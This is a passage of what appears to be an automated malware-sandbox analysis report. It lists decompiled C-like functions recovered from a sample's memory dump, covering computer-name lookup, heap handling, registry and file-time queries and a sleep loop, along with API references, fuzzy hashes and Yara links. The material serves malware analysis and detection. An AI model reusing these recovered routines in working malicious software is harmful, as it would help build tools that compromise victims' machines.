Opcode Fuzzy Hash: cc8d620181a067ec0a89f63fc63a215bd1f0c578ab28276519366d5079d2847d
Instruction Fuzzy Hash: A5018B3690010EBFCB019FA8D90CCAF7BBDEF48750B014412FA09E7111D7309A15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F673E9, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02F673E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02F658BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02F6147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02f673ee
0x02f673f9
0x02f673fb
0x02f67401
0x02f67403
0x02f67408
0x02f67411
0x02f67415
0x02f6741e
0x02f67422
0x02f67431
0x02f67424
0x02f67425
0x02f6742a
0x02f6742a
0x02f67422
0x02f67415
0x02f6743a

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,02F651DC,7519F710,00000000,?,?,02F651DC), ref: 02F67401

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

GetComputerNameExA.KERNELBASE(00000003,00000000,02F651DC,02F651DD,?,?,02F651DC), ref: 02F6741E

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: a66126e3c32ff449b50a00fbe83dfb0311e2e7691725fce9d6dd60498a44676a
Instruction ID: e96371bc6a1d054ef3fb9b2679d43f1dd29ecd71b9ced505b7e0022140143293
Opcode Fuzzy Hash: a66126e3c32ff449b50a00fbe83dfb0311e2e7691725fce9d6dd60498a44676a
Instruction Fuzzy Hash: 18F03626E00149FAE711D6B68E4CEBBBAADDBC5694F510055A614D3540DA74DA0186A0

Uniqueness

Uniqueness Score: -1.00%

Function 02F64DDC, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E02F64DDC(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x2f6d238, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x02f64de1
0x02f64de6
0x02f64df4
0x02f64dfa
0x02f64dfe
0x02f64e6f
0x02f64e00
0x02f64e04
0x02f64e07
0x02f64e0a
0x02f64e11
0x02f64e12
0x02f64e13
0x02f64e15
0x02f64e1a
0x02f64e21
0x02f64e27
0x02f64e28
0x02f64e28
0x02f64e2f
0x02f64e30
0x02f64e31
0x02f64e35
0x02f64e41
0x02f64e47
0x02f64e48
0x02f64e48
0x02f64e4a
0x02f64e50
0x02f64e52
0x02f64e57
0x02f64e58
0x02f64e58
0x02f64e5e
0x02f64e67
0x02f64e69
0x02f64e6c
0x02f64e7b

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 02F64DF4

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cd7dd3a5b12bce530fb9a37436e871d02a1ef1f71e95fe9e07f72a430ef3cc5c
Instruction ID: 35248fd6ad8a3906cebe0eef7ca97c805088729cc2496412b30ccd98cc0aa93a
Opcode Fuzzy Hash: cd7dd3a5b12bce530fb9a37436e871d02a1ef1f71e95fe9e07f72a430ef3cc5c
Instruction Fuzzy Hash: A8112931685344AFEB169F69D455BEABBA5DF63398F14408EE5808F292C377850BC720

Uniqueness

Uniqueness Score: -1.00%

Function 02F67BA9, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02F67BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2f6d2a4; // 0xb3a5a8
				_t4 = _t15 + 0x2f6e39c; // 0x3aa8944
				_t20 = _t4;
				_t6 = _t15 + 0x2f6e124; // 0x650047
				_t17 = E02F6642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02F64CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02f67bb3
0x02f67bba
0x02f67bbb
0x02f67bbc
0x02f67bbd
0x02f67bc3
0x02f67bc8
0x02f67bc8
0x02f67bd2
0x02f67be4
0x02f67beb
0x02f67c19
0x02f67bed
0x02f67bef
0x02f67bf4
0x02f67c16
0x02f67bf6
0x02f67bf9
0x02f67c00
0x02f67c05
0x02f67c07
0x02f67c07
0x02f67c0c
0x02f67c0c
0x02f67bf4
0x02f67c20

APIs

Part of subcall function 02F6642C: SysFreeString.OLEAUT32(?), ref: 02F6650B

Part of subcall function 02F64CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02F6358E,004F0053,00000000,?), ref: 02F64CDC
Part of subcall function 02F64CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02F6358E,004F0053,00000000,?), ref: 02F64D06
Part of subcall function 02F64CD3: memset.NTDLL ref: 02F64D1A

SysFreeString.OLEAUT32(00000000), ref: 02F67C0C

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 53eabf0d8e066a4e45df985a64fc7505cd2bf383cf821adaa7b731a40e922d0c
Instruction ID: e08a958b40933754c6a99d6d76eb440747f9d43e9774de057e6ed73ef4ae881a
Opcode Fuzzy Hash: 53eabf0d8e066a4e45df985a64fc7505cd2bf383cf821adaa7b731a40e922d0c
Instruction Fuzzy Hash: 74017532500119BFEB11AFA4CD08DAAFBBAEB04398F010525EA05E7161E771D952CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F69D87, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E02F69D87(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E02F64DDC(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x2f6d2a4; // 0xb3a5a8
						_t9 = _t17 + 0x2f6ea48; // 0x444f4340
						_t20 = E02F662CD( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x2f6d238, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x02f69d8a
0x02f69d90
0x02f69de7
0x02f69d96
0x02f69da1
0x02f69da6
0x02f69daa
0x02f69db7
0x02f69dbf
0x02f69dcb
0x02f69dd3
0x02f69ddd
0x02f69ddd
0x02f69daa
0x02f69dec

APIs

Part of subcall function 02F64DDC: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 02F64DF4

Part of subcall function 02F662CD: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 02F66301
Part of subcall function 02F662CD: StrStrA.SHLWAPI(00000000,?), ref: 02F6630E
Part of subcall function 02F662CD: RtlAllocateHeap.NTDLL(00000000,?), ref: 02F6632D
Part of subcall function 02F662CD: memcpy.NTDLL(00000000,0000000B,0000000B), ref: 02F66341
Part of subcall function 02F662CD: memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 02F66350
Part of subcall function 02F662CD: memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 02F6636B

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,02F64FA1), ref: 02F69DDD

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapmemcpy$Allocate$Freelstrlen
String ID:
API String ID: 4098479933-0
Opcode ID: c2ef77a2b349a388508014f11c013fb9cbac0e39e46afdc91d343220e81671b8
Instruction ID: 9bb8a7b2fced7256f4fc87a01b9d1a5668027e28178e9ded9400c6bf62320cdc
Opcode Fuzzy Hash: c2ef77a2b349a388508014f11c013fb9cbac0e39e46afdc91d343220e81671b8
Instruction Fuzzy Hash: 8F016936600108FFDB218F44CC48EEABBBAEF447D0F104525FA9AC6160EB71EA55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01511000, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E01511000(void* __eax, intOrPtr _a4) {

				 *0x1514150 =  *0x1514150 & 0x00000000;
				_push(0);
				_push(0x151414c);
				_push(1);
				_push(_a4);
				 *0x1514148 = 0xc; // executed
				L015111CE(); // executed
				return __eax;
			}

0x01511000
0x01511007
0x01511009
0x0151100e
0x01511010
0x01511014
0x0151101e
0x01511023

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(01511711,00000001,0151414C,00000000), ref: 0151101E

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 37cecc3b7c3a08883bb03be0896e4a0d410c2dafc8b07fde4398ab43b35aff01
Instruction ID: 4bdff3e0033dc338c9b6f8598d6f55dddedaeda73ca6233c13e800bc82c3966d
Opcode Fuzzy Hash: 37cecc3b7c3a08883bb03be0896e4a0d410c2dafc8b07fde4398ab43b35aff01
Instruction Fuzzy Hash: 15C04CB43C0341A6F6329F509C45F457A917771B05F161508B6202D1C8D3F614589615

Uniqueness

Uniqueness Score: -1.00%

Function 02F658BE, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F658BE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x2f6d238, 0, _a4); // executed
				return _t2;
			}

0x02f658ca
0x02f658d0

APIs

RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 179c544a4bcc665a52735a4ec29b52f2718ae03a6bc65315dcedb4e061c24757
Instruction ID: c791b54f6e7c869d6702bd529d4901f736d4eadac9e36edc30083ca9f519b5ca
Opcode Fuzzy Hash: 179c544a4bcc665a52735a4ec29b52f2718ae03a6bc65315dcedb4e061c24757
Instruction Fuzzy Hash: 2EB01231A80104FBCA015B00DD0CF05FB21EB50B40F038811F29084074C3314430EB25

Uniqueness

Uniqueness Score: -1.00%

Function 02F6147E, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F6147E(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x2f6d238, 0, _a4); // executed
				return _t2;
			}

0x02f6148a
0x02f61490

APIs

RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: aff0e5c00f4fae0ca2d4966c44efce2885c46e40ce6c31f7c68b5a3b922cf234
Instruction ID: 00e90c5837cff1b02b85dcbe6639e2c5f7ba70f5b3c8f914b469d7eb4971566b
Opcode Fuzzy Hash: aff0e5c00f4fae0ca2d4966c44efce2885c46e40ce6c31f7c68b5a3b922cf234
Instruction Fuzzy Hash: B6B01231980104BBCA114B40DD0CF05FB21EB50F80F024912F294C4070C3314470FB04

Uniqueness

Uniqueness Score: -1.00%

Function 02F64B44, Relevance: 1.3, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F64B44(void* __eax, void* __ecx, void* __edx, void* _a4, void** _a8, intOrPtr* _a12) {
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				int _v40;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void* _t41;
				void* _t46;
				void* _t57;
				void* _t59;
				int _t62;
				void* _t63;
				void* _t65;
				void* _t66;

				_t60 = __ecx;
				_t59 = _a4;
				_t62 = 0;
				_t63 = __eax;
				_v16 = 0;
				_v12 = 0;
				_a4 = 0;
				if(__eax <= 0x40) {
					L20:
					return _t62;
				}
				_t41 = E02F64E7E(_a12, __ecx, __edx,  &_v72,  &_v16, _t59 + __eax - 0x40);
				if(_t41 != 0) {
					goto L20;
				}
				_t64 = _t63 - 0x40;
				if(_v40 > _t63 - 0x40) {
					goto L20;
				}
				while( *((char*)(_t66 + _t41 - 0x34)) == 0) {
					_t41 = _t41 + 1;
					if(_t41 < 0x10) {
						continue;
					}
					_t62 = _v40;
					_t57 = E02F658BE(_t62);
					_a4 = _t57;
					_t74 = _t57;
					if(_t57 != 0) {
						_t62 = 0;
						L17:
						if(_t62 != 0) {
							goto L20;
						}
						L18:
						if(_a4 != 0) {
							E02F6147E(_a4);
						}
						goto L20;
					}
					memcpy(_t57, _t59, _t62);
					L7:
					_t65 = _a4;
					E02F61B80(_t60, _t74, _t65, _t62,  &_v32);
					if(_v32 != _v72 || _v28 != _v68 || _v24 != _v64 || _v20 != _v60) {
						L14:
						_t62 = 0;
						goto L18;
					} else {
						 *_a8 = _t65;
						goto L17;
					}
				}
				_t46 = E02F6A3DA(_t64, _t59,  &_a4,  &_v12,  &_v56, 0); // executed
				__eflags = _t46;
				if(_t46 != 0) {
					_t62 = _v12;
					goto L17;
				}
				_t62 = _v40;
				_t30 = _t62 + 0xf; // 0x2f67ac9
				__eflags = _v12 - (_t30 & 0xfffffff0);
				if(__eflags == 0) {
					goto L7;
				}
				goto L14;
			}

0x02f64b44
0x02f64b4b
0x02f64b50
0x02f64b52
0x02f64b54
0x02f64b57
0x02f64b5a
0x02f64b60
0x02f64c31
0x02f64c37
0x02f64c37
0x02f64b76
0x02f64b7d
0x00000000
0x00000000
0x02f64b83
0x02f64b89
0x00000000
0x00000000
0x02f64b8f
0x02f64b96
0x02f64b9a
0x00000000
0x00000000
0x02f64b9c
0x02f64ba0
0x02f64ba5
0x02f64ba8
0x02f64baa
0x02f64c18
0x02f64c1f
0x02f64c21
0x00000000
0x00000000
0x02f64c23
0x02f64c27
0x02f64c2c
0x02f64c2c
0x00000000
0x02f64c27
0x02f64baf
0x02f64bb7
0x02f64bb7
0x02f64bc0
0x02f64bcb
0x02f64c14
0x02f64c14
0x00000000
0x02f64be5
0x02f64be8
0x00000000
0x02f64be8
0x02f64bcb
0x02f64bfd
0x02f64c02
0x02f64c04
0x02f64c1c
0x00000000
0x02f64c1c
0x02f64c06
0x02f64c09
0x02f64c0f
0x02f64c12
0x00000000
0x00000000
0x00000000

APIs

memcpy.NTDLL(00000000,?,02F67ABA,02F67ABA,?,?,?,?,00000001,?), ref: 02F64BAF

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 66b394ce53c1cf683bce224ab9ad441bded8619b8d3dd1ea1dc8af1d5e6ae862
Instruction ID: 1a2d7f3c4369a3966c24f7f3fc743e694f4dad647148dc96934a3f2f12c531cf
Opcode Fuzzy Hash: 66b394ce53c1cf683bce224ab9ad441bded8619b8d3dd1ea1dc8af1d5e6ae862
Instruction Fuzzy Hash: 3331F072D0010DAFDF21EE99C988EFEBBBAEB45294F104065E614E7240D730DA85CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02F69347, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02F69347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x2f6d330;
				E02F6684E();
				while(1) {
					_t8 = E02F632BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E02F6A5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x2f6d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E02F6684E();
					if(_t19 != 0) {
						_t22 =  *0x2f6d338; // 0x3aa9b60
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x02f6934f
0x02f69353
0x02f69354
0x02f69355
0x02f6935a
0x02f6935f
0x02f69366
0x02f6936d
0x00000000
0x00000000
0x02f6936f
0x02f69374
0x02f69375
0x02f6937c
0x02f69396
0x00000000
0x02f6937e
0x02f6937e
0x02f69380
0x02f69383
0x02f69387
0x00000000
0x00000000
0x02f69389
0x02f69387
0x02f6939e
0x02f6939e
0x02f693a0
0x02f693a7
0x02f693a9
0x02f693af
0x02f693b6
0x02f693c6
0x02f693be
0x02f693c1
0x02f693c1
0x02f693c9
0x02f693c9
0x02f693d2
0x02f693d2
0x02f6939c
0x00000000

APIs

Part of subcall function 02F6684E: GetProcAddress.KERNEL32(36776F57,02F6935F), ref: 02F66869

Part of subcall function 02F632BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 02F632E5
Part of subcall function 02F632BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 02F63307
Part of subcall function 02F632BA: memset.NTDLL ref: 02F63321
Part of subcall function 02F632BA: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02F6335F
Part of subcall function 02F632BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02F63373
Part of subcall function 02F632BA: CloseHandle.KERNEL32(00000000), ref: 02F6338A
Part of subcall function 02F632BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02F63396
Part of subcall function 02F632BA: lstrcat.KERNEL32(?,642E2A5C), ref: 02F633D7
Part of subcall function 02F632BA: FindFirstFileA.KERNELBASE(?,?), ref: 02F633ED

Part of subcall function 02F6A5E9: lstrlen.KERNEL32(?,00000000,02F6D330,00000001,02F6937A,02F6D00C,02F6D00C,00000000,00000005,00000000,00000000,?,?,?,02F6207E,?), ref: 02F6A5F2
Part of subcall function 02F6A5E9: mbstowcs.NTDLL ref: 02F6A619
Part of subcall function 02F6A5E9: memset.NTDLL ref: 02F6A62B

HeapFree.KERNEL32(00000000,02F6D00C,02F6D00C,02F6D00C,00000000,00000005,00000000,00000000,?,?,?,02F6207E,?,02F6D00C,?,?), ref: 02F69396

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$Allocatememset$AddressCloseCreateFindFirstFreeHandleProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 172136534-0
Opcode ID: d613f5fa901f27e2e76d6e6fb7172110fd8c4389365ce22b90b19abab6fb5a86
Instruction ID: 4f1aa6baa8e8412230a07b384747be7f359d5b8c5a1ba00486beef99ece7eb51
Opcode Fuzzy Hash: d613f5fa901f27e2e76d6e6fb7172110fd8c4389365ce22b90b19abab6fb5a86
Instruction Fuzzy Hash: 19012D32700245EAE7105FE6CD8EB7AB6ADEB457D8F091036F744C7080D7B08C419760

Uniqueness

Uniqueness Score: -1.00%

Function 02F61B13, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F61B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E02F67BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E02F674B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x2f6d238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}

0x02f61b1b
0x02f61b72
0x02f61b77
0x02f61b1d
0x02f61b37
0x02f61b3b
0x02f61b40
0x02f61b42
0x02f61b54
0x02f61b60
0x02f61b44
0x02f61b44
0x02f61b49
0x02f61b4e
0x02f61b4e
0x02f61b42
0x02f61b3b
0x02f61b7d

APIs

Part of subcall function 02F674B9: RegCloseKey.ADVAPI32(80000002,?,02F6A72B,3D02F6C0,80000002,02F6553C,00000000,02F6553C,?,65696C43,80000002,00000000,?), ref: 02F67550

HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,02F6690C,?,004F0053,03AA9388,00000000,?), ref: 02F61B60

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: 6435d62e9937eaaf7cd296de229133c16191cb37082ab97eb6be2f29c63f0399
Instruction ID: c5566a0a3bae002997a28087a020e0415fc04632b5039b1f0cd9996452a3015d
Opcode Fuzzy Hash: 6435d62e9937eaaf7cd296de229133c16191cb37082ab97eb6be2f29c63f0399
Instruction Fuzzy Hash: FD01623254020AFBCB219F98DC09FBB7B69EF047A0F048415FB199A260D7318920DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02F6A872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x02f6a872
0x02f6a87f
0x02f6a880
0x02f6a881
0x02f6a888
0x02f6a8b6
0x02f6a8b7
0x02f6a8ba
0x02f6a8c0
0x00000000
0x00000000
0x02f6a89f
0x02f6a8a9
0x02f6a8b0
0x00000000
0x02f6a8a1
0x02f6a8a4
0x02f6a8c4
0x02f6a8a6
0x02f6a8a6
0x00000000
0x02f6a8a6
0x02f6a8a4
0x02f6a8cb
0x02f6a8d1
0x02f6a8d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 02F6A8BA

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
